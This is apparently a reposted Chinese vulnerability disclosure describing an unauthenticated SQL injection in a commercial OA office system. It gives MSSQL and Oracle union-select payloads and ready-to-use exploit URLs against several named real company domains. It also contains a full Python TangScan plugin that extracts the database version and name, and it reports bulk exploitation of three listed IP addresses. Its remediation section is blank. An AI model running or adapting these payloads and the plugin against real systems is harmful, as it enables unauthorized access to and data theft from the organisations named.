首页 » 漏洞 » 某OA通用型SQL注入漏洞(为支持TangScan而来)

某OA通用型SQL注入漏洞(为支持TangScan而来)

 

1)通用型SQL注入漏洞

厂商:源天软件

网址:http://www.visionsoft.com.cn/

漏洞链接:ServiceAction/com.velcro.base.DataAction

说明:该oa系统使用mssql和oracle两个类型的数据库。

案例分别给出两种类型的利用poc。

利用POC:

code 区域
MsSql数据库:

ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true
code 区域
Oracle数据库:

ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true

漏洞证明(直接访问即可):

code 区域
MsSql部分

A)http://km.best-team.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true

B)http://bms.9square.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true

C)http://oa.jsfuan.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true

code 区域
Oracle部分

D)http://winshare.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true

E)http://oa.mcds.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual&isworkflow=true

2)说好的为了支持 TangScan 而来

直接给出编写好的插件代码(本人代码盲,瞎写的,大牛勿喷),等公布时,该插件已经入库 TangScan.com 。

code 区域
#! /usr/bin/env python

# -*- coding: utf-8 -*-



"""

Copyright (c) 2013-2014 TangScan developers (http://www.wooyun.org/)

See the file 'docs/COPYING' for copying permission

author: fate0 <[email protected] >

"""



import re



from thirdparty import requests

from modules.exploit import TSExploit





__all__ = ['TangScan']





class TangScan(TSExploit):

def __init__(self):

super(self.__class__, self).__init__()

self.info = {

"name": "源天软件OA办公系统 sql 注入MSSQL版漏洞(无需登录)",

"product": "源天",

"product_version": "",

"desc": """

OA办公系统 /ServiceAction/com.velcro.base.DataAction 中的 sql 参数存在注入, 将导致敏感数据泄漏

""",

"license": self.license.TS,

"author": ["Coody"],

"ref": [

{self.ref.wooyun: "暂无"},

],

"type": self.type.injection,

"severity": self.severity.high,

"privileged": False,

"disclosure_date": "2015-07-22",

"create_date": "2015-07-23",

}



self.register_option({

"url": {

"default": "",

"required": True,

"choices": [],

"convert": self.convert.url_field,

"desc": "目标 url"

}

})



self.register_result({

"status": False,

"data": {

"db_info": {

"version": "",

"current_db": ""

}

},

"description": "",

"error": ""

})



def verify(self):

self.print_debug("verify start")



re_version_pattern = re.compile(r'<data>(.+?)</data>', re.IGNORECASE | re.DOTALL | re.MULTILINE)

exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true".format(domain=self.option.url))



try:

response = requests.get(exp_url, timeout=15, verify=False)

except Exception, e:

self.result.error = str(e)

return



re_result = re_version_pattern.findall(response.content)

if len(re_result) == 0:

self.result.status = False

return



self.result.status = True

self.result.data.db_info.version = re_result[0]

self.result.description = "目标 {url} 存在sql注入, 目标使用数据库版本为: {db_version}".format(

url=self.option.url,

db_version=re_result[0]

)





def exploit(self):

self.print_debug("exploit start")



re_userinfo_pattern = re.compile(r'<data>(.+?)</data>', re.IGNORECASE | re.DOTALL | re.MULTILINE)

exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select db_name()&isworkflow=true".format(domain=self.option.url))



try:

response = requests.get(exp_url, timeout=15, verify=False)

except Exception, e:

self.result.error = str(e)

return



re_result = re_userinfo_pattern.findall(response.content)

if len(re_result) == 0:

self.result.status = False

return



self.result.status = True

self.result.data.db_info.current_db = re_result[0]

self.result.description = "目标 {url} 存在sql注入, 数据库名称为: {current_db}".format(

url=self.option.url,

current_db=self.result.data.db_info.current_db

)





if __name__ == '__main__':

from modules.main import main

main(TangScan())

看下执行插件后的结果:

code 区域
执行 --mode verify (默认)

某OA通用型SQL注入漏洞(为支持TangScan而来)

code 区域
执行 --mode exploit

某OA通用型SQL注入漏洞(为支持TangScan而来)

插件运行正常,能够顺利输出数据。。。。。。

code 区域
到这里本来应该结束了

但是我手贱

给出批量检测网站的脚本测试结果



测试的网站分别是:

http://60.12.113.234:8080/

http://121.14.195.31:8081/

http://218.246.22.194:8080/

测试中,直接执行 --mode exploit ,批量获取数据库名称吧。

某OA通用型SQL注入漏洞(为支持TangScan而来)

测试完毕,看下结果文件 success.txt 内容

某OA通用型SQL注入漏洞(为支持TangScan而来)

嗯、到这里该结束了···

漏洞证明:

修复方案:

原文链接:某OA通用型SQL注入漏洞(为支持TangScan而来),转载请注明来源!

0